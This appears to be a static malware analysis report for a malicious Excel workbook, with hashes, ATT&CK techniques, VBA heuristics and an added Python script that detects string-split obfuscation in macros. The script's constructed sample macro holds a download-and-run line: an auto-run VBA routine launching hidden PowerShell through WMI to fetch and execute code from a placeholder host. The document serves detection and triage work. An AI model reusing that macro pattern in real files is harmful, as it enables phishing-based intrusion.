Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e87b1c828787a9cb…

MALICIOUS

Office (OOXML)

Size: 41.5 KB
Created: 2021-06-22 12:43:05 UTC
Authoring application: Microsoft Excel 16.0300
MD5: d1d2906f7622cc55ff269acc2fb873e1
SHA-1: d7677d5513aa9afe83ec3f75a745e6b2407156f6
SHA-256: e87b1c828787a9cb867bbf9903910a095092956857d2ec6a379b9248ad1dea3f
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell
  • T1566.001 Phishing: Spearphishing Attachment

The Excel workbook carries a VBA project whose macro source references cmd.exe and PowerShell, which indicates that the macro is built to run commands rather than to automate the spreadsheet. The GetObject call is a frequent companion of those references in macro malware: it is typically used to obtain a WMI object (for example through a winmgmts: moniker) so that the command is launched via WMI instead of as a direct child of the Office process. The VBA source is obfuscated, so the exact command line was not recovered statically, but the combination points to a downloader whose job is to fetch and execute a second-stage payload, the usual role of a spearphishing attachment used for initial access. Recovering the payload URL and the final command line requires deobfuscating the carved macros.bas or detonating the sample in a sandbox; the verdict here rests on static indicators only.

Heuristics (4)

  • OLE_VBA_PS (critical): PowerShell reference in VBA
  • OLE_VBA_GETOBJ (high): GetObject call
  • OLE_VBA_CMD (high): cmd.exe reference in VBA
  • OOXML_VBA (medium): VBA project inside OOXML (document contains a VBA project; VBA macros present)
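The heuristics above and the analyst note are easy to reproduce, and doing so shows the one trap in keyword-based VBA triage: string-splitting obfuscation ("pow" & "er" & "shell", Chr(99) & "md") defeats a naive substring search. The script below is an added example written for this page, not the vendor's scanner or oletools code. It assumes the VBA source has already been decoded (as olevba did for macros.bas), applies the four heuristic IDs from the report, folds split string literals before matching, and checks the OOXML container for a vbaProject.bin part. The regexes, the severity weights (chosen so that the four hits sum to the report's 160), the MALICIOUS threshold, and the sample macro and container are all assumptions or constructed inputs.

```python
"""Added triage example for the report's VBA heuristics (not the vendor's code)."""
import io
import re
import zipfile

# Heuristic IDs and severities are those listed in the report; the regexes and
# the numeric weights are assumptions (weights chosen so four hits sum to 160).
VBA_HEURISTICS = [
    ("OLE_VBA_PS", "critical", r"powershell"),
    ("OLE_VBA_GETOBJ", "high", r"\bGetObject\s*\("),
    ("OLE_VBA_CMD", "high", r"\bcmd(?:\.exe)?\b"),
]
SEVERITY_WEIGHT = {"critical": 60, "high": 40, "medium": 20}
MALICIOUS_THRESHOLD = 100  # assumption


def fold_vba_strings(src):
    """Undo simple string-splitting obfuscation so matching sees the literal the
    macro builds at runtime: Chr(99) & "md" -> "cmd", "pow" & _ "er" -> "power"."""
    def chr_to_literal(m):
        n = int(m.group(1))
        # only printable ASCII and never a quote, so the literal stays well-formed
        return '"%s"' % chr(n) if 32 <= n < 127 and n != 34 else m.group(0)

    src = re.sub(r"\bChr\$?\(\s*(\d+)\s*\)", chr_to_literal, src, flags=re.I)
    # "a" & "b", "a" + "b", and "a" & _ <newline> "b" all join into "ab"
    joiner = re.compile(r'"([^"\n]*)"\s*[&+]\s*_?\s*"([^"\n]*)"')
    prev = None
    while prev != src:  # repeat until no adjacent literals remain
        prev = src
        src = joiner.sub(r'"\1\2"', src)
    return src


def scan_vba_source(src, fold=True):
    """Return (heuristic id, severity) pairs that fire on decoded VBA source."""
    text = fold_vba_strings(src) if fold else src
    return [(hid, sev) for hid, sev, pat in VBA_HEURISTICS
            if re.search(pat, text, re.I)]


def vba_parts_in_ooxml(container_bytes):
    """List VBA project parts in an OOXML zip (the OOXML_VBA heuristic). The part
    is an OLE2/MS-OVBA blob; decoding it to source is olevba's job, not done here."""
    with zipfile.ZipFile(io.BytesIO(container_bytes)) as z:
        return [n for n in z.namelist() if n.lower().endswith("vbaproject.bin")]


def triage(container_bytes, decoded_vba):
    hits = scan_vba_source(decoded_vba)
    if vba_parts_in_ooxml(container_bytes):
        hits.append(("OOXML_VBA", "medium"))
    score = sum(SEVERITY_WEIGHT[sev] for _, sev in hits)
    verdict = ("MALICIOUS" if score >= MALICIOUS_THRESHOLD
               else "SUSPICIOUS" if hits else "CLEAN")
    return {"hits": hits, "score": score, "verdict": verdict}


# --- constructed sample input (not the real sample's macro) -------------------
SAMPLE_VBA = '''Sub Auto_Open()
    Dim wmi As Object, cmdline As String
    Set wmi = GetObject("winmgmts:")
    cmdline = Chr(99) & "md.exe /c pow" & "er" & _
        "shell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/p'))"
    wmi.Get("Win32_Process").Create cmdline, Null, Null, 0
End Sub
'''


def build_sample_xlsm():
    """Minimal OOXML container with a placeholder xl/vbaProject.bin (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    print("naive hits :", scan_vba_source(SAMPLE_VBA, fold=False))
    print("folded hits:", scan_vba_source(SAMPLE_VBA))
    print(triage(build_sample_xlsm(), SAMPLE_VBA))
```

Run against the constructed macro, the naive pass fires only OLE_VBA_GETOBJ, while the folded pass fires all three VBA heuristics; with the container check that is four hits and a score of 160, matching the report. Folding is deliberately shallow (literal concatenation and Chr() only); real samples also use StrReverse, Replace, Split/Join and array lookups, which is why the analyst note above still calls for full deobfuscation or detonation before trusting any recovered command line.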

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 34430 bytes
  SHA-256: 642f91910db3830af116bdccf3647a123b5fd728e0eb0872c4ccbb6ec48b67c5

Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 11264 bytes
  SHA-256: 9242cfef67f2767f8d40c88d281ee3cec71f32fd52f2c31377cdb8a3d192652a